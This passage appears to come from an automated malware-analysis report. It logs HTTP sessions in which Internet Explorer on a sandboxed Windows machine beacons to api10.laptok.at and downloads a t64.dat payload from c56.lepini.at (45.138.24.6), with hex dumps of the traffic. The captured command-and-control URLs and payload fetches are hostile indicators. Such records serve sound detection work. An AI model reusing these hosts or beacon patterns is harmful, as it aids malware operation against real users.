6a 6f 6c 2b 11 5b 3c 07 d5 25 ef 9e da 30 9b 49 2a e0 52 d2 f2 7d 25 97 16 6e 25 12 b3 93 48 1c fe e5 8a f7 e4 e1 26 05 49 4c 88 dc 11 54 a1 bf 56 89 9d 9d c9 cf 92 03 c8 1d fd fa 7d aa 6d e2 79 d1 af ed e3 0d cf 8f 09 35 3a 5d ed 60 8d 00 89 7f a7 7e 1c 65 df f2 a9 ad a5 d9 66 ad b8 7d 17 72 54 2d 5f cb 7c 5f 5a 21 dc cb 3f 62 77 f6 39 aa 2c c3 9f 74 fe b0 cc 0d 45 08 d5 ed 5f 0e de e0 71 38 b5 b8 dc 35 22 5c bd eb a6 fa 72 82 01 62 13 76 ab ef ae b5 4b 39 5f 1b bb 29 03 7c 8e c8 cb cf c8 24 fd c8 18 1c e8 d0 83 16 c6 7b d9 b3 48 8a 79 d4 50 d9 d1 cd a2 a3 f7 8a f9 60 38 7a 41 60 1a 9f 59 4d 61 65 d1 52 b3 5a 51 16 1e 2d 13 c1 c3 e5 56 8a cd a2 70 85 1f fb 3e f5 67 3a 02 e3 67 88 1c 31 e2 f2 42 b9 55 b3 29 66 77 d3 7a 38 1d 5c d0 9d 77 7e ef d5 26 06 f4 96 e2 a5 87 be 2d 7b dd 77 e3 ca b7 a1 97 cc bd 30 ac 2f d3 6b 7c ce e8 ea d9 ab ed 02 39 e0 da fa 74 8d bb 94 b4 e5 00 aa c2 84 bb 28 ce 71 1d f7 81 e0 13 bc 37 bb 23 15 85 6b 9f 0d b1 3f f4 2f 3e c0 20 5c cd 02 16 e6 a1 33 5a 07 d0 fc 42 49 67 62 34 f3 eb a7 80 01 df d1 b5 98 fa d9 9d 52 a8 54 d2 87 5e 7f e4 72 fb bd 01 5a 1b cf 75 e7 5c b2 00 75 2c 74 f4 be 5b fd 9e f9 7c dc 83 0f 19 8d 3f 5a cd 9e 3a c7 a1 7a 7a bf 13 e1 28 cd 8c df 36 74 31 b9 a3 bf ea 4d 00 d6 4c ef 53 6d 01 27 30 ca 6b 7e e8 9a 59 ce 57 76 b3 ce 47 70 54 dd bb 4b d5 ee 3e c7 97 a2 39 80 b6 30 55 cd a3 7f 67 74 5e 0a d9 54 21 9b 63 40 f2 d7 01 f9 55 61 f3 80 7c e5 aa 7b b5 d4 97 b9 94 48 48 71 dc c8 01 e5 a9 6f 76 62 e8 47 75 5b 0b 6e 6a d7 3a 04 d6 f0 fe c1 91 58 42 a2 26 35 db 7a 94 bc 31 08 14 8e 80 73 0b c1 5a 0f 37 c5 c5 4f 44 1c dd 56 69 7e 64 fb 21 2e 4f 3d 2a 8e 70 73 ca d4 50 76 3d 04 c6 d1 4a e1 63 5e 7e ff 62 f1 d2 fe fa 8f 56 49 f5 be 44 52 c1 62 36 e8 59 f4 9c 37 b7 eb 65 02 15 9d c9 ef ae 5f 72 0e d7 66 89 1d 4a 4b 71 Data Ascii: 2000?nKvJ@]QKo\nU6jE+n?>Sc.jP2,whxJKOeN{95azjXi~Y1^-\|$8DD4B^6~7rl{6N#Xbv!\|n8$zdNM%[Y>0$q[a:4nJvu$s$(k\ZJ0c=QS5@=&u@]VEt3?tV,K0VnN;b/ER&Z3kOh$Op\V,+`alW(}5)v9FS$sta0n&45:uU:m@`e"{BiCBjol+[<%0IR}%n%H&ILTV}my5:]`~ef}rT-_\|_Z!?bw9,tE_q85"\rbvK9_)\|${HyP`8zA`YMaeRZQ-Vp>g:g1BU)fwz8\w~&-{w0/k\|9t(q7#k?/> \3ZBIgb4RT^rZu\u,t[\|?Z:zz(6t1MLSm'0k~YWvGpTK>90Ugt^T!c@Ua\|{HHqovbGu[nj:XB&5z1sZ7ODVi~d!.O=psPv=Jc^~bVIDRb6Y7e_rfJKq
Jan 26, 2021 19:45:09.784720898 CET	6988	IN	Data Raw: 45 57 59 02 94 d9 c7 47 14 be 49 21 bf 2b 30 58 89 b4 e4 c0 f3 c3 35 0c ed dc e4 ab 3b 15 3d 76 0b 46 30 95 ad d6 2d bc ce 83 03 da 6e 14 14 25 f0 4b d7 a0 75 b5 1c af c0 0f 45 9f f2 06 e8 69 b3 90 18 f2 d2 1c f1 aa 85 51 bb c0 c3 2e b2 cb 6f b4 Data Ascii: EWYGI!+0X5;=vF0-n%KuEiQ.owBG4Edm-Ft_9G`3eDE?hMe=Ml{sebSdmumv$l1@4EQBBRc\&Eo%^W4(X}J#w}E7Uaz
Jan 26, 2021 19:45:09.784893990 CET	6990	IN	Data Raw: c6 7f 4e 4c fe 05 fe 82 16 70 4e 6b 62 9e 80 3c 27 a8 d9 26 e8 c2 3c 46 52 ae af 6a fe 3e 8a 8d 25 ae c1 6e 78 3b 40 6d 45 69 5b 05 1a ba 95 97 db 8a 92 85 e4 d8 05 13 89 21 bb e8 f4 1d 53 8c 67 39 34 4c 0a 47 ab 70 da b1 42 7b 88 76 f6 35 c6 22 Data Ascii: NLpNkb<'&<FRj>%nx;@mEi[!Sg94LGpB{v5"xkiChn]G-qNlf'^VC~lC,Y~MRMd7tj>wR_LurH#dVt9XeT>Z_{CO
Jan 26, 2021 19:45:09.834827900 CET	6991	IN	Data Raw: f4 7c 66 ae 4d de 51 d9 95 bb bb 6f 02 63 81 0d 6e 8b e2 de 2c cc 67 ba d1 45 b6 ff 03 55 04 68 41 7e b9 72 dc 66 07 08 a7 a0 09 34 34 63 80 e0 cf 07 5c 92 49 76 ce 47 fa 42 fa 30 3b a1 a5 01 4d ba bf 02 5d 59 4e 20 ea 91 c4 1d b1 ce a1 d2 2b b6 Data Ascii: \|fMQocn,gEUhA~rf44c\IvGB0;M]YN +%H<s-4BeI<Ox%yV=oi.EA`:s5-vqYL7o\|(yS*a"E<#@3?}zz>>eQZc"/_>W
Jan 26, 2021 19:45:09.835005999 CET	6993	IN	Data Raw: fd fe 76 87 3b 9b d0 df 5f 83 d1 57 2d 57 7d cc 83 50 b5 3f b4 64 4f 45 e7 de c2 7d 76 0e 36 16 d5 d5 db 5f 9d ea 75 d6 88 5a bb a8 d5 fd 33 eb 25 ba de f1 4d ef 2d d3 6e 8b 67 5e e0 95 a3 23 3c 3c cd de 6a ef 68 51 78 12 2b 98 83 c7 73 4b a0 ee Data Ascii: v;_W-W}P?dOE}v6_uZ3%M-ng^#<<jhQx+sKhzis,R8!omGeS\HFO]%qnKD;6\|dz^W0.73ZZIJ"?KkgG?4&lJ5n~

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49769	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:15.151518106 CET	10304	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Jan 26, 2021 19:45:15.268407106 CET	10371	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 26 Jan 2021 18:45:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49781	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:18.147516012 CET	11306	OUT	GET /api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav92wE6yEv/uYPkaiYomq7al/rA1mR_2F/ERR1VtnRVC9Z9L97Yj0nEFv/RXcdmcZw3t/09S9mQ4TEGPoFg0wu/CB1TTO3K_2Fx/ES759oV_2F3/AqQYGPBuqK6lVx/HnWardAtMd40kxzRqiZ4c/ezlyaUtSbXNYPJd5/jFNmBUf7ol4D5iv/PAhhoqRwskHN_2BfyW/Qy04blpWl/1eFKv0iNVI2O85WUZxuE/12FPAo3Lux39x5EugSB/ZIqsnBNs_2B_2BTY3S2vKa/rTxfhO8bj/vDrid7bT/A HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Jan 26, 2021 19:45:18.537538052 CET	11309	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 36 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 15 94 b5 b6 ed 08 0c 43 3f 28 45 98 8a 57 84 99 73 42 5d 98 99 f3 f5 73 a7 71 a3 c2 4b b2 b5 d5 52 02 a9 db 6f de 81 13 26 0c e0 94 1f 94 7b 07 90 a2 99 50 8f e7 97 dd 0a be 7a ee 60 38 3a 2e 69 79 b2 76 dc da e7 d9 9c 19 8d 2c f7 bb 89 f1 99 36 29 2d 16 3d fd 95 35 9e 2c 7f 0a 7d ed f1 36 7e 9f 8e 63 5a f4 9a 68 80 87 9d 8c 9f be 38 d5 bb 91 4d 58 0d 03 b9 3c fa 9b e7 f1 ca 73 17 86 ce 00 ef 43 4a 3f e5 97 e5 b1 23 76 69 57 18 02 bb e1 40 70 02 a6 c7 4e f7 60 89 e3 b6 01 42 0a 19 84 ee 24 a0 89 d1 03 49 15 a8 e4 21 70 ad b8 bc d1 66 91 c9 69 c0 60 2b ba ed f9 28 b3 3b 64 98 ac c4 53 d4 5a 3a 1a b0 9a ce 0b 85 da 6c 85 37 08 5f 93 a6 39 d9 c9 40 29 44 0b 31 90 19 94 8d 16 8f f4 66 89 b1 94 1d 84 bf 44 86 d4 32 53 bd 19 20 38 0c 8a 67 89 ed b2 e7 e8 50 a0 29 c8 7d ca 6e 76 11 4b 9a bf a0 15 3e a7 08 6a d4 0f e0 79 05 7b 6c e2 65 83 52 79 b5 91 13 b4 66 ec 67 a1 1a 0c 83 c3 df 16 b6 e9 5c 95 a5 68 32 27 b0 14 3f d3 21 00 4a de fa 4e f4 c6 b8 fb 68 d4 43 bb 32 f3 fa 47 8b a5 69 54 c6 e7 6f 41 9e 0d 71 b8 f2 1a fb 3a 45 1e 61 78 68 73 ae c1 09 c2 84 3f e4 dd bf 15 a6 fa 2c 85 d3 93 51 93 a5 6a 0f 50 47 84 fa 6b 26 cd 51 44 aa 40 68 8c 20 54 8c 34 a3 65 67 d8 b2 58 b2 63 e6 e7 4b de 9b bc 89 c4 ea 69 c7 33 95 b4 00 1a 84 1d 93 ad d5 af 0b 82 8b a6 4c 3a b4 38 d5 64 b7 89 3d 08 92 de 9d 74 b0 ba 18 01 1d c7 0b e2 f3 04 ae 2f 5a a4 15 a2 e0 ca ca 26 f4 e7 2e 83 96 ce 86 3a 04 fc a2 2c 22 0f 53 56 3f 4e bd 8c 60 0a 57 00 6c 4f e8 08 19 94 51 c6 8a 97 9d 6a fd ee 73 91 15 24 0d 63 68 6b b2 ab d0 a2 09 a4 60 36 d7 4b e1 65 0e 57 6b ff 53 a6 59 47 04 32 d8 f8 db de 6c 9a 13 7b 53 23 e6 00 13 6a e3 e9 85 33 bc 2a a1 5f 8a a6 d5 1e b4 31 cb b1 98 2b ca 91 6e 9c 81 c1 22 fd f3 37 62 ef 26 2a 77 93 bb bb 60 0e f9 ee 61 99 3c d4 9b 14 5c 42 58 45 63 55 d2 35 2d 8c d9 33 01 6f d8 a0 28 b7 24 09 2a 13 b2 4c aa 48 b3 ef 23 f8 51 64 a5 cb ce 90 8c 7e 9d 76 3a ff a5 86 97 d3 7e 73 64 4a 0e b8 3a 12 db 3f b7 9f 6e ed c8 9f 42 d6 e7 0a c3 2f 1e d3 fd 8e 9b f1 6c 72 43 e6 50 9d 97 be 51 9c d0 03 9c 20 1d 6c 71 f7 ac 03 ee 77 97 1f bb d5 92 38 19 b9 bf 1b b6 f7 b9 f6 e4 88 b8 c5 c2 3d 1e 46 fd d8 de 78 52 f6 8d 96 47 de 4b 38 5f c7 40 07 55 f7 04 a4 1d 28 9b 9e 78 1f 81 75 1b 89 06 7f bd d9 32 86 6c 8f e8 b4 dc 4f 57 30 11 09 00 6c 50 f9 9f db 73 67 2a c1 4b 0a 84 82 cc 23 bb 3f 80 54 ef 16 0a 78 6a 7a 7f 7a 43 a5 2a 69 39 98 c0 fb 4a 9a c6 4b 9a df 62 cb ca 29 a3 06 52 6f 2b f4 46 68 91 f6 7e 66 ce ca 87 17 07 d5 af 68 bb 42 2c 4a 68 a0 d4 cc 95 03 34 9e d8 af 53 df 4c d9 f5 fa c5 22 f0 cc df 42 8a 5d d6 c1 d2 f2 ad 8d 82 01 f6 00 a4 e5 71 df 52 03 6b a0 c0 a7 3f 36 0b 2e f6 ad 64 7a af ff a6 90 92 9e 5d 8c 57 03 4a 75 92 a8 92 15 18 87 23 f8 80 d5 86 b7 a0 19 fb f7 ec ac 54 3e 3c a8 b0 94 19 42 69 d0 f5 79 55 2a fb f6 40 ce 4d a0 22 02 a5 94 64 12 1d b5 da 10 c3 5d d7 45 1c 2d df 5c 84 1e 31 d0 7e 94 b2 ec f8 5e cf 18 bb d4 72 e3 13 fb 24 29 9f e2 6b 46 d2 60 54 cf d8 f0 42 41 a5 19 76 93 0d d8 34 07 bd af 2a c4 15 95 15 40 10 1d 07 d6 f7 f3 65 01 f2 7b 4f ac 22 d9 c1 12 9d 73 2d a9 41 23 cd 75 25 2b e0 fd e5 a3 38 36 a9 85 4d f0 Data Ascii: 762C?(EWsB]sqKRo&{Pz`8:.iyv,6)-=5,}6~cZh8MX<sCJ?#viW@pN`B$I!pfi`+(;dSZ:l7_9@)D1fD2S 8gP)}nvK>jy{leRyfg\h2'?!JNhC2GiToAq:Eaxhs?,QjPGk&QD@h T4egXcKi3L:8d=t/Z&.:,"SV?N`WlOQjs$chk`6KeWkSYG2l{S#j3_1+n"7b&w`a<\BXEcU5-3o($LH#Qd~v:~sdJ:?nB/lrCPQ lqw8=FxRGK8_@U(xu2lOW0lPsgK#?TxjzzCi9JKb)Ro+Fh~fhB,Jh4SL"B]qRk?6.dz]WJu#T><BiyU@M"d]E-\1~^r$)kF`TBAv4*@e{O"s-A#u%+86M
Jan 26, 2021 19:45:18.537602901 CET	11310	IN	Data Raw: 93 a1 1a 1f e1 43 a5 66 bb a7 47 af 97 3e e8 e2 63 e0 4f 17 44 f1 4c 2e 29 fb f4 7e a1 5e f3 05 b4 ef b7 3a 2a c8 78 32 18 47 cc 39 97 57 99 0e d9 61 df 80 a4 c5 56 b2 f1 74 bb 2b de c8 af e9 21 35 e5 e0 e1 ea 66 3a 9f 17 fd e1 07 0b 3f 8c d3 bd Data Ascii: CfG>cODL.)~^:*x2G9WaVt+!5f:?9tZ037Fp0"&zxL{7'x z.E\|>q-}"MXY5V>^[r3dc_n=Pn)%\%lT9UcC

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49785	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:51.249437094 CET	11570	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Jan 26, 2021 19:45:51.383198023 CET	11571	IN	Data Raw: 9e bf 58 28 80 24 87 bf da 94 c7 42 88 7e 22 ac d7 f2 b9 32 22 4c 5a bd 20 59 56 42 87 f4 1f a0 52 36 80 65 3f 95 d4 86 5d 85 3c 33 43 99 c7 62 0e ac 20 52 61 47 e8 3b 64 10 bb 85 36 ec 1a 7f 7b ad 0d 0c d1 fb 28 97 f7 b8 ce f3 13 18 cc fe e8 31 Data Ascii: X($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8\|ymf&ASxYE6Vfy8H&2Q$I@?`1@o/V"h/th)BXnI?~k_/`Ga7r,W=v9#S>_*l$,Joz)
Jan 26, 2021 19:45:51.383543015 CET	11573	IN	Data Raw: 17 73 20 cd 89 a0 e5 d0 aa a9 5c 3c a8 76 e8 c2 0f 12 3d 8d 2a 65 f1 f8 37 99 b2 e7 3e 6d 1a 99 99 10 c6 68 d2 d3 07 d6 2d 6b e6 5c 3d 32 f0 40 4e b6 ef bb fa e3 d9 43 dc 7a bc 51 22 d7 a1 af cd 09 93 e3 34 a9 15 35 5f d5 b5 fd e8 73 84 03 71 c5 Data Ascii: s \<v=e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(B{0(\MB?r~bvb1#QhBg/z{h,cbmyezJe.;R=XU<
Jan 26, 2021 19:45:51.384026051 CET	11574	IN	Data Raw: 0c ad 53 24 5a 26 87 81 d1 be 6c fc d3 e3 ad a8 f3 63 46 e3 1f 61 3c 28 3a f6 af 1c 0e cc 98 da 20 b7 23 1a aa a0 16 76 c9 da 50 cc 8e 7c cb b5 e3 40 21 63 50 6b 0e 6e 36 41 7b c5 9b 19 89 b8 0f 21 c3 64 ef 51 13 dd 1e a7 a6 24 d2 1a 7b 5a f3 10 Data Ascii: S$Z&lcFa<(: #vP\|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21WQWltwb1lXJSp1&zSXS(iu_YrL59JBD^qq:VF"eo{i9Coyo#
Jan 26, 2021 19:45:51.384500980 CET	11575	IN	Data Raw: 6d 9e bb 0b ad 5b f3 81 5a 81 a0 08 6f ab 28 38 81 0f bd e4 80 32 5d ae 8e 55 44 ca e9 a5 92 30 ff 79 d3 1b 6f d6 cd 53 d2 97 d4 85 76 5c e7 99 e4 3a 5e 45 27 66 8c fd 17 96 d6 29 c8 6b 00 f4 ee ac 11 48 c8 75 ab 58 e2 ef a9 df f9 23 5f c1 2e 9c Data Ascii: m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVLNHlc7:}N;RMaj`B>9yKG>YH.(Gst"N:p-"iw(=/}9}z/a
Jan 26, 2021 19:45:51.384959936 CET	11577	IN	Data Raw: 8e 06 a0 3f 79 e9 ee af c3 f8 f0 5d 26 a1 83 0e 4c 3d 67 e0 1e 25 a3 af ab 41 97 0f 78 17 af 7d 20 43 ae 92 95 72 27 99 0a 6e 16 06 8f 76 ab cd 18 7c e8 01 b5 99 bd 26 7f e4 f5 67 d6 ba da 36 0d cd f4 77 8e 48 8e 4c be 7f 54 a3 c2 6b 3f 4e bc 03 Data Ascii: ?y]&L=g%Ax} Cr'nv\|&g6wHLTk?N~d>,<AHkPyhv?RcD5EomU1Y\}<@Dpn;%M9a/y"J&O2uz-wZ^?MWE-4O,
Jan 26, 2021 19:45:51.500011921 CET	11578	IN	Data Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41 Data Ascii: hG&\|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm\|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp
Jan 26, 2021 19:45:51.553972006 CET	11580	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:51 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
Jan 26, 2021 19:45:51.603708982 CET	11581	IN	Data Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8 Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8\|ymf&ASxYE6*Vfy
Jan 26, 2021 19:45:51.603945017 CET	11582	IN	Data Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1 Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)\|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
Jan 26, 2021 19:45:51.669101954 CET	11584	IN	Data Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23 Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
Jan 26, 2021 19:45:51.669158936 CET	11585	IN	Data Raw: 0c ad 53 24 5a 26 87 81 d1 be 6c fc d3 e3 ad a8 f3 63 46 e3 1f 61 3c 28 3a f6 af 1c 0e cc 98 da 20 b7 23 1a aa a0 16 76 c9 da 50 cc 8e 7c cb b5 e3 40 21 63 50 6b 0e 6e 36 41 7b c5 9b 19 89 b8 0f 21 c3 64 ef 51 13 dd 1e a7 a6 24 d2 1a 7b 5a f3 10 Data Ascii: S$Z&lcFa<(: #vP\|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21WQWltwb1lXJSp1&zSXS(iu_YrL59JBD^qq:VF"eo{i9Coyo#

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.7	49788	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
